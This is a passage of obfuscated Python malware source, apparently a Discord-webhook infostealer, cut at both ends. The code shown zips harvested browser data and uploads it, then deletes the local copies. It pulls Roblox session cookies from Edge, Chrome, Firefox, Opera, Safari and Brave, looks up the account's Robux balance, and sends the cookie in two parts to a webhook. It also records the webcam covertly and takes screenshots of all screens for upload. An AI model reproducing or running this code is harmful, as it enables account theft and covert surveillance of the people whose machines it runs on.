                f.write('\n'.join(QBSVPSWALXQAFSPBNEHOTGYLCXWKSTKPMPZFQGGLTYFLALFICCYQQFKFALLPNZZJIDQOLZGVBMZPQXBQVJDWCNQEAFNYIYY))
        with ZipFile(f'Browser_{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR}.zip', 'w') as zipf:
            for v4r_file in os.listdir(f'Browser_{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR}'):
                zipf.write(os.path.join(f'Browser_{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR}', v4r_file), v4r_file)

    def send_files(POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR, HEVYSHBUSPMJMIBDUMAOQTDGZEISUXJZVYYXPLWWEOSEPKMAUKOFNXPWZILKXLEZJNAUIGPGFZUOTSEDVNNUW):
        HEVYSHBUSPMJMIBDUMAOQTDGZEISUXJZVYYXPLWWEOSEPKMAUKOFNXPWZILKXLEZJNAUIGPGFZUOTSEDVNNUW.send(embed=Embed(title=f'Browser Steal  `{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR} \"{WFMGCCEVIPSXGHSXGXFSMCPGDBHDQWYYNNHTLRYLKEVEFCRTGSNAKBDQEKNXBMOHHLYSRDBWMMGVCQTXTNNSWOSJUNP}\"`:', description=f"Found In **{'**, **'.join(NECYVLUOJQRMTZQCVNHKICFBSHRCKJSIGTMYWCMCXVOSETRKVBXLZFOXBX)}**:```" + '\n'.join(tree(Path(f'Browser_{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR}'))) + '```', color=OYLUXSBEMQVAZDUZITFQCBYLXSEUUPLRMCZUJIHCNAYEHDIFYFJYYYEECIOYTUDBBYEEEYOZQRABANOGVIVJGJFUNMSITZFRKGE).set_footer(text=UCDSLAQDCVXIWSTDCAOPBUTXYGIXDKZLQMPJNHORITFVBQUEVVXRJLUKENJ, icon_url=WMKOWXGKEDEGRKABUHAUCHMYNXNGVEJTPOPQBYTWTSKNSGQUKIFMYFWFBFDDPUDXSZHECPEIUJYJODGCCOM), file=NWILWYNOORHWSHOHRGGENTLTWIIMUCBEHODOWUOFPUKPVFERTENRUNPCJRQQZGJDXBTPFNMPMKKTYCCPETMJZFLJJNTP, username=WMKOWXGKEDEGRKABUHAUCHMYNXNGVEJTPOPQBYTWTSKNSGQUKIFMYFWFBFDDPUDXSZHECPEIUJYJODGCCOM)

    def clean_files(POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR):
        shutil.rmtree(f'Browser_{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR}')
        os.remove(f'Browser_{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR}.zip')

    def tree(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN: Path, v4r_prefix: str='', v4r_midfix_folder: str='📂 - ', v4r_midfix_file: str='📄 - '):
        v4r_pipes = {'space': '    ', 'branch': '│   ', 'tee': '├── ', 'last': '└── '}
        if v4r_prefix == '':
            yield (v4r_midfix_folder + XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN.name)
        contents = list(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN.iterdir())
        pointers = [v4r_pipes['tee']] * (len(contents) - 1) + [v4r_pipes['last']]
        for v4r_pointer, XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN in zip(pointers, contents):
            if XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN.is_dir():
                yield f"{v4r_prefix}{v4r_pointer}{v4r_midfix_folder}{XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN.name} ({len(list(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN.glob('**/*')))} files, {sum((f.stat().st_size for f in XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN.glob('**/*') if f.is_file())) / 1024:.2f} kb)"
                v4r_extension = v4r_pipes['branch'] if v4r_pointer == v4r_pipes['tee'] else v4r_pipes['space']
                yield from tree(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN, prefix=v4r_prefix + v4r_extension)
            else:  # inserted
                yield f'{v4r_prefix}{v4r_pointer}{v4r_midfix_file}{XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN.name} ({XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN.stat().st_size / 1024:.2f} kb)'
    Br0ws53r_Main()

def R0b10x_C00ki3():
    import browser_cookie3
    import requests
    import json
    from discord import SyncWebhook, Embed
    import discord
    VUVXGVIWDVUFIZXIHVDCVOBXJYYAUGVUDBMDEWADAXUHXUGAUAOUVDJZWBKRDBHLOEQVISDIARFWSZMSLN = []

    def g3t_c00ki3_4nd_n4vig4t0r(JLRVDHBNVYFQORAHLPABMYHXJIJIWHYPCZSBXCGJTIHLNRROURZNUGOAVHZWNBBQJCRGZTNVLISVCYPIXYSXONXGRHKEDJ):
        try:
            v4r_c00kie5 = JLRVDHBNVYFQORAHLPABMYHXJIJIWHYPCZSBXCGJTIHLNRROURZNUGOAVHZWNBBQJCRGZTNVLISVCYPIXYSXONXGRHKEDJ()
            v4r_c00kie5 = str(v4r_c00kie5)
            v4r_c00kie = v4r_c00kie5.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
            v4r_n4vigator = JLRVDHBNVYFQORAHLPABMYHXJIJIWHYPCZSBXCGJTIHLNRROURZNUGOAVHZWNBBQJCRGZTNVLISVCYPIXYSXONXGRHKEDJ.__name__
            return (v4r_c00kie, v4r_n4vigator)
        except:
            return (None, None)

    def Microsoft_Edge():
        return browser_cookie3.edge(domain_name='roblox.com')

    def Google_Chrome():
        return browser_cookie3.chrome(domain_name='roblox.com')

    def Firefox():
        return browser_cookie3.firefox(domain_name='roblox.com')

    def Opera():
        return browser_cookie3.opera(domain_name='roblox.com')

    def Opera_GX():
        return browser_cookie3.opera_gx(domain_name='roblox.com')

    def Safari():
        return browser_cookie3.safari(domain_name='roblox.com')

    def Brave():
        return browser_cookie3.brave(domain_name='roblox.com')
    GQAKWWFMQZAKYGMCLICNKMQPOOKFLEMXIWYFBKGDAXOGUCXZXKAXZLMYCPBRPVPKMNS = [Microsoft_Edge, Google_Chrome, Firefox, Opera, Opera_GX, Safari, Brave]
    for v4r_br0ws3r in GQAKWWFMQZAKYGMCLICNKMQPOOKFLEMXIWYFBKGDAXOGUCXZXKAXZLMYCPBRPVPKMNS:
        v4r_c00ki3, v4r_n4vigator = g3t_c00ki3_4nd_n4vig4t0r(v4r_br0ws3r)
        if v4r_c00ki3 and v4r_c00ki3 not in VUVXGVIWDVUFIZXIHVDCVOBXJYYAUGVUDBMDEWADAXUHXUGAUAOUVDJZWBKRDBHLOEQVISDIARFWSZMSLN:
            VUVXGVIWDVUFIZXIHVDCVOBXJYYAUGVUDBMDEWADAXUHXUGAUAOUVDJZWBKRDBHLOEQVISDIARFWSZMSLN.append(v4r_c00ki3)
            try:
                WYEKVTBUORBUICHGSUFIJHWUMZUDYUUMINNKJZWNNIXCUOIDZCYNWLFJQZKYDLDWGWACNPUBOZ = requests.get('https://www.roblox.com/mobileapi/userinfo', cookies={'.ROBLOSECURITY': v4r_c00ki3})
                KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU = json.loads(WYEKVTBUORBUICHGSUFIJHWUMZUDYUUMINNKJZWNNIXCUOIDZCYNWLFJQZKYDLDWGWACNPUBOZ.text)
            except:
                pass
            GXNWRBEDBDZMDRPPHLOTMAIDMATJGSRSQGENONQIHMDCFFBQRUDKWGVSGJCZEKEMZZTTOEABZAPLDAK = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('id', 'None')
            QOMVUXOVUXZWKHJKMGSDEFPIXCHJBZBTQGNBXFFMKINXBPGBJHDSZSYMPXLVPBQVZN = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('displayName', 'None')
            IROAZTPTMFKBIHQWKWXNGGXOWXTFBWQXWZAIWGMURLLKEGTAODISTVNEAUIRDRTSAHZURZFRVSNPLXLRAPEEL = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('name', 'None')
            OOJWYJJLDXXRFMPCHWSGYWSWBMOMBFZHKICUYULJAXCCAQWWFCNWLFNHQFECMX = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('RobuxBalance', 'None')
            NBMKLADEZYCPKCDEYSTNJYNPDCWEGLCJJQIDFYHXAVYEQGDRJZFDSULYBCNGXCDRXUOEKJVXONLNWZKTTIIOWBOO = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('IsPremium', 'None')
            SOKABNMAEQPHKIKZOMETYSCIFXMNSFXTDGFYWRYPLLSQRHRGDDCBTODEXERXDJTQ = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('ThumbnailUrl', 'None')
            HQMVXYMGPLMGVGABEKTPZUWBTBLFVFVJDRVAVOCDNKVQCZNVHUPOYUZ = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('IsAnyBuildersClubMember', 'None')
            NOHIYIFEBMIEJPCAJPQBNYSBQOOSJTXNHJSEDDUADGSPSGOIKCWKCJXHSNFYZZUZTZIKNCXQVJLUZMXVXOUIXSAMLDJNEQKPAD = len(v4r_c00ki3)
            BHGCPDUDPJMCHZGUWJUMROTMSMPCRGOSZXRUQCXJNVGNMRPTNUACHKDQDLIGKNK = NOHIYIFEBMIEJPCAJPQBNYSBQOOSJTXNHJSEDDUADGSPSGOIKCWKCJXHSNFYZZUZTZIKNCXQVJLUZMXVXOUIXSAMLDJNEQKPAD // 2
            RRRIGNSUXCJYFUFGTCGGBQXRUNKLXNNNMADNCESRUBMAMMJDZOKIAYTTTZKHNVTSDBGNWFVEPHUMKF = v4r_c00ki3[:BHGCPDUDPJMCHZGUWJUMROTMSMPCRGOSZXRUQCXJNVGNMRPTNUACHKDQDLIGKNK]
            OSGNRHMFATYELRVYVJKVYROYOFOPFNTQTFWPWSDUYECDRWHORAJANGB = v4r_c00ki3[BHGCPDUDPJMCHZGUWJUMROTMSMPCRGOSZXRUQCXJNVGNMRPTNUACHKDQDLIGKNK:]
            HEVYSHBUSPMJMIBDUMAOQTDGZEISUXJZVYYXPLWWEOSEPKMAUKOFNXPWZILKXLEZJNAUIGPGFZUOTSEDVNNUW = SyncWebhook.from_url(YISFUMZNBSQOHJTWRLDKXATHEJBMDWMKCOJCMOGKOTOIIHFAZCK)
            IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK = discord.Embed(title=f'Roblox Cookie `{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR} \"{WFMGCCEVIPSXGHSXGXFSMCPGDBHDQWYYNNHTLRYLKEVEFCRTGSNAKBDQEKNXBMOHHLYSRDBWMMGVCQTXTNNSWOSJUNP}\"`:', color=OYLUXSBEMQVAZDUZITFQCBYLXSEUUPLRMCZUJIHCNAYEHDIFYFJYYYEECIOYTUDBBYEEEYOZQRABANOGVIVJGJFUNMSITZFRKGE)
            IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK.set_footer(text=UCDSLAQDCVXIWSTDCAOPBUTXYGIXDKZLQMPJNHORITFVBQUEVVXRJLUKENJ, icon_url=WMKOWXGKEDEGRKABUHAUCHMYNXNGVEJTPOPQBYTWTSKNSGQUKIFMYFWFBFDDPUDXSZHECPEIUJYJODGCCOM)
            IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK.set_thumbnail(url=SOKABNMAEQPHKIKZOMETYSCIFXMNSFXTDGFYWRYPLLSQRHRGDDCBTODEXERXDJTQ)
            IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK.add_field(name=':compass: Navigator:', value=f'```{v4r_n4vigator}```', inline=True)
            IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK.add_field(name=':bust_in_silhouette: Username:', value=f'```{IROAZTPTMFKBIHQWKWXNGGXOWXTFBWQXWZAIWGMURLLKEGTAODISTVNEAUIRDRTSAHZURZFRVSNPLXLRAPEEL}```', inline=True)
            IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK.add_field(name=':bust_in_silhouette: DisplayName:', value=f'```{QOMVUXOVUXZWKHJKMGSDEFPIXCHJBZBTQGNBXFFMKINXBPGBJHDSZSYMPXLVPBQVZN}```', inline=True)
            IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK.add_field(name=':robot: Id:', value=f'```{GXNWRBEDBDZMDRPPHLOTMAIDMATJGSRSQGENONQIHMDCFFBQRUDKWGVSGJCZEKEMZZTTOEABZAPLDAK}```', inline=True)
            IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK.add_field(name=':moneybag: Robux:', value=f'```{OOJWYJJLDXXRFMPCHWSGYWSWBMOMBFZHKICUYULJAXCCAQWWFCNWLFNHQFECMX}```', inline=True)
            IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK.add_field(name=':tickets: Premium:', value=f'```{NBMKLADEZYCPKCDEYSTNJYNPDCWEGLCJJQIDFYHXAVYEQGDRJZFDSULYBCNGXCDRXUOEKJVXONLNWZKTTIIOWBOO}```', inline=True)
            IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK.add_field(name=':construction_site: Builders Club:', value=f'```{HQMVXYMGPLMGVGABEKTPZUWBTBLFVFVJDRVAVOCDNKVQCZNVHUPOYUZ}```', inline=True)
            IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK.add_field(name=':cookie: Cookie Part 1:', value=f'```{RRRIGNSUXCJYFUFGTCGGBQXRUNKLXNNNMADNCESRUBMAMMJDZOKIAYTTTZKHNVTSDBGNWFVEPHUMKF}```', inline=False)
            IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK.add_field(name=':cookie: Cookie Part 2:', value=f'```{OSGNRHMFATYELRVYVJKVYROYOFOPFNTQTFWPWSDUYECDRWHORAJANGB}```', inline=False)
            HEVYSHBUSPMJMIBDUMAOQTDGZEISUXJZVYYXPLWWEOSEPKMAUKOFNXPWZILKXLEZJNAUIGPGFZUOTSEDVNNUW.send(embed=IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK, username=NWILWYNOORHWSHOHRGGENTLTWIIMUCBEHODOWUOFPUKPVFERTENRUNPCJRQQZGJDXBTPFNMPMKKTYCCPETMJZFLJJNTP, avatar_url=WMKOWXGKEDEGRKABUHAUCHMYNXNGVEJTPOPQBYTWTSKNSGQUKIFMYFWFBFDDPUDXSZHECPEIUJYJODGCCOM)
    if not VUVXGVIWDVUFIZXIHVDCVOBXJYYAUGVUDBMDEWADAXUHXUGAUAOUVDJZWBKRDBHLOEQVISDIARFWSZMSLN:
        HEVYSHBUSPMJMIBDUMAOQTDGZEISUXJZVYYXPLWWEOSEPKMAUKOFNXPWZILKXLEZJNAUIGPGFZUOTSEDVNNUW = SyncWebhook.from_url(YISFUMZNBSQOHJTWRLDKXATHEJBMDWMKCOJCMOGKOTOIIHFAZCK)
        IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK = Embed(title=f'Roblox Cookie `{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR} \"{WFMGCCEVIPSXGHSXGXFSMCPGDBHDQWYYNNHTLRYLKEVEFCRTGSNAKBDQEKNXBMOHHLYSRDBWMMGVCQTXTNNSWOSJUNP}\"`:', description='No roblox cookie found.', color=OYLUXSBEMQVAZDUZITFQCBYLXSEUUPLRMCZUJIHCNAYEHDIFYFJYYYEECIOYTUDBBYEEEYOZQRABANOGVIVJGJFUNMSITZFRKGE)
        IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK.set_footer(text=UCDSLAQDCVXIWSTDCAOPBUTXYGIXDKZLQMPJNHORITFVBQUEVVXRJLUKENJ, icon_url=WMKOWXGKEDEGRKABUHAUCHMYNXNGVEJTPOPQBYTWTSKNSGQUKIFMYFWFBFDDPUDXSZHECPEIUJYJODGCCOM)
        HEVYSHBUSPMJMIBDUMAOQTDGZEISUXJZVYYXPLWWEOSEPKMAUKOFNXPWZILKXLEZJNAUIGPGFZUOTSEDVNNUW.send(embed=IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK, username=NWILWYNOORHWSHOHRGGENTLTWIIMUCBEHODOWUOFPUKPVFERTENRUNPCJRQQZGJDXBTPFNMPMKKTYCCPETMJZFLJJNTP, avatar_url=WMKOWXGKEDEGRKABUHAUCHMYNXNGVEJTPOPQBYTWTSKNSGQUKIFMYFWFBFDDPUDXSZHECPEIUJYJODGCCOM)

def C4m3r4_C4ptur3():
    import os
    import cv2
    from discord import SyncWebhook, Embed, File
    from datetime import datetime
    try:
        from datetime import datetime
        PDCLNSGSPFMDZUAGPKNYDMEBTTHZMLRHAAAMAZEQBWGDRAGHQBTHJNFOGHCULPYS_file_capture = f'CameraCapture_{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR}.avi'
        XTWZKAKGIRIBGLWIPDSPHYZFMPOVBWYAICQLNYNLFREWSTNFIVNSDVGMGNTQCDXCC = 10
        GFJYYITMTNUKAMMBAUPKBHOTJPVHMGNFGCKCOQQPNYXTILKHZZGCBEYOGQNULENXEQIQLPKVSNBGRV = cv2.VideoCapture(0)
        if not GFJYYITMTNUKAMMBAUPKBHOTJPVHMGNFGCKCOQQPNYXTILKHZZGCBEYOGQNULENXEQIQLPKVSNBGRV.isOpened():
            Clear()
            HEVYSHBUSPMJMIBDUMAOQTDGZEISUXJZVYYXPLWWEOSEPKMAUKOFNXPWZILKXLEZJNAUIGPGFZUOTSEDVNNUW = SyncWebhook.from_url(YISFUMZNBSQOHJTWRLDKXATHEJBMDWMKCOJCMOGKOTOIIHFAZCK)
            IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK = Embed(title=f'Camera Capture `{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR} \"{WFMGCCEVIPSXGHSXGXFSMCPGDBHDQWYYNNHTLRYLKEVEFCRTGSNAKBDQEKNXBMOHHLYSRDBWMMGVCQTXTNNSWOSJUNP}\"`:', description='No camera found.', color=OYLUXSBEMQVAZDUZITFQCBYLXSEUUPLRMCZUJIHCNAYEHDIFYFJYYYEECIOYTUDBBYEEEYOZQRABANOGVIVJGJFUNMSITZFRKGE)
            IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK.set_footer(text=UCDSLAQDCVXIWSTDCAOPBUTXYGIXDKZLQMPJNHORITFVBQUEVVXRJLUKENJ, icon_url=WMKOWXGKEDEGRKABUHAUCHMYNXNGVEJTPOPQBYTWTSKNSGQUKIFMYFWFBFDDPUDXSZHECPEIUJYJODGCCOM)
            HEVYSHBUSPMJMIBDUMAOQTDGZEISUXJZVYYXPLWWEOSEPKMAUKOFNXPWZILKXLEZJNAUIGPGFZUOTSEDVNNUW.send(embed=IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK, username=NWILWYNOORHWSHOHRGGENTLTWIIMUCBEHODOWUOFPUKPVFERTENRUNPCJRQQZGJDXBTPFNMPMKKTYCCPETMJZFLJJNTP, avatar_url=WMKOWXGKEDEGRKABUHAUCHMYNXNGVEJTPOPQBYTWTSKNSGQUKIFMYFWFBFDDPUDXSZHECPEIUJYJODGCCOM)
            return

        def c4ptur3(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN_file_capture):
            v4r_fourcc = cv2.VideoWriter_fourcc(*'XVID')
            v4r_out = cv2.VideoWriter(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN_file_capture, v4r_fourcc, 20.0, (640, 480))
            v4r_time_start = datetime.now()
            Clear()
            while (datetime.now() - v4r_time_start).seconds < XTWZKAKGIRIBGLWIPDSPHYZFMPOVBWYAICQLNYNLFREWSTNFIVNSDVGMGNTQCDXCC:
                Clear()
                v4r_ret, v4r_frame = GFJYYITMTNUKAMMBAUPKBHOTJPVHMGNFGCKCOQQPNYXTILKHZZGCBEYOGQNULENXEQIQLPKVSNBGRV.read()
                if not v4r_ret:
                    Clear()
                    break
                v4r_out.write(v4r_frame)
            GFJYYITMTNUKAMMBAUPKBHOTJPVHMGNFGCKCOQQPNYXTILKHZZGCBEYOGQNULENXEQIQLPKVSNBGRV.release()
            v4r_out.release()
            Clear()
        try:
            XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN_file_capture = f"{os.path.join(os.environ.get('USERPROFILE'), 'Documents')}\\{PDCLNSGSPFMDZUAGPKNYDMEBTTHZMLRHAAAMAZEQBWGDRAGHQBTHJNFOGHCULPYS_file_capture}"
            c4ptur3(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN_file_capture)
        except:
            XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN_file_capture = PDCLNSGSPFMDZUAGPKNYDMEBTTHZMLRHAAAMAZEQBWGDRAGHQBTHJNFOGHCULPYS_file_capture
            c4ptur3(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN_file_capture)
        IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK = Embed(title=f'Camera Capture `{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR} \"{WFMGCCEVIPSXGHSXGXFSMCPGDBHDQWYYNNHTLRYLKEVEFCRTGSNAKBDQEKNXBMOHHLYSRDBWMMGVCQTXTNNSWOSJUNP}\"`:', color=OYLUXSBEMQVAZDUZITFQCBYLXSEUUPLRMCZUJIHCNAYEHDIFYFJYYYEECIOYTUDBBYEEEYOZQRABANOGVIVJGJFUNMSITZFRKGE, description=f'```└── 📷 - {PDCLNSGSPFMDZUAGPKNYDMEBTTHZMLRHAAAMAZEQBWGDRAGHQBTHJNFOGHCULPYS_file_capture}```')
        IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK.set_footer(text=UCDSLAQDCVXIWSTDCAOPBUTXYGIXDKZLQMPJNHORITFVBQUEVVXRJLUKENJ, icon_url=WMKOWXGKEDEGRKABUHAUCHMYNXNGVEJTPOPQBYTWTSKNSGQUKIFMYFWFBFDDPUDXSZHECPEIUJYJODGCCOM)
        HEVYSHBUSPMJMIBDUMAOQTDGZEISUXJZVYYXPLWWEOSEPKMAUKOFNXPWZILKXLEZJNAUIGPGFZUOTSEDVNNUW = SyncWebhook.from_url(YISFUMZNBSQOHJTWRLDKXATHEJBMDWMKCOJCMOGKOTOIIHFAZCK)
        with open(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN_file_capture, 'rb') as f:
            HEVYSHBUSPMJMIBDUMAOQTDGZEISUXJZVYYXPLWWEOSEPKMAUKOFNXPWZILKXLEZJNAUIGPGFZUOTSEDVNNUW.send(embed=IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK, file=File(f, filename=PDCLNSGSPFMDZUAGPKNYDMEBTTHZMLRHAAAMAZEQBWGDRAGHQBTHJNFOGHCULPYS_file_capture), username=NWILWYNOORHWSHOHRGGENTLTWIIMUCBEHODOWUOFPUKPVFERTENRUNPCJRQQZGJDXBTPFNMPMKKTYCCPETMJZFLJJNTP, avatar_url=WMKOWXGKEDEGRKABUHAUCHMYNXNGVEJTPOPQBYTWTSKNSGQUKIFMYFWFBFDDPUDXSZHECPEIUJYJODGCCOM)
        if os.path.exists(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN_file_capture):
            os.remove(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN_file_capture)
        Clear()
    except:
        Clear()

def Scr33n5h0t():
    import os
    from PIL import ImageGrab
    from discord import SyncWebhook, Embed, File
    try:
        PDCLNSGSPFMDZUAGPKNYDMEBTTHZMLRHAAAMAZEQBWGDRAGHQBTHJNFOGHCULPYS_file_screen = f'Screenshot_{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR}.png'

        def capture(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN):
            v4r_image = ImageGrab.grab(bbox=None, include_layered_windows=False, all_screens=True, xdisplay=None)
            v4r_image.save(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN)
        try:
            XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN_file_screen = f"{os.path.join(os.environ.get('USERPROFILE'), 'Documents')}\\{PDCLNSGSPFMDZUAGPKNYDMEBTTHZMLRHAAAMAZEQBWGDRAGHQBTHJNFOGHCULPYS_file_screen}"
            capture(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN_file_screen)
        except:
            XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN_file_screen = PDCLNSGSPFMDZUAGPKNYDMEBTTHZMLRHAAAMAZEQBWGDRAGHQBTHJNFOGHCULPYS_file_screen
            capture(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN_file_screen)
        IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK = Embed(title=f'Screenshot `{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR} \"{WFMGCCEVIPSXGHSXGXFSMCPGDBHDQWYYNNHTLRYLKEVEFCRTGSNAKBDQEKNXBMOHHLYSRDBWMMGVCQTXTNNSWOSJUNP}\"`:', color=OYLUXSBEMQVAZDUZITFQCBYLXSEUUPLRMCZUJIHCNAYEHDIFYFJYYYEECIOYTUDBBYEEEYOZQRABANOGVIVJGJFUNMSITZFRKGE)
        IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK.set_image(url=f'attachment://{PDCLNSGSPFMDZUAGPKNYDMEBTTHZMLRHAAAMAZEQBWGDRAGHQBTHJNFOGHCULPYS_file_screen}')
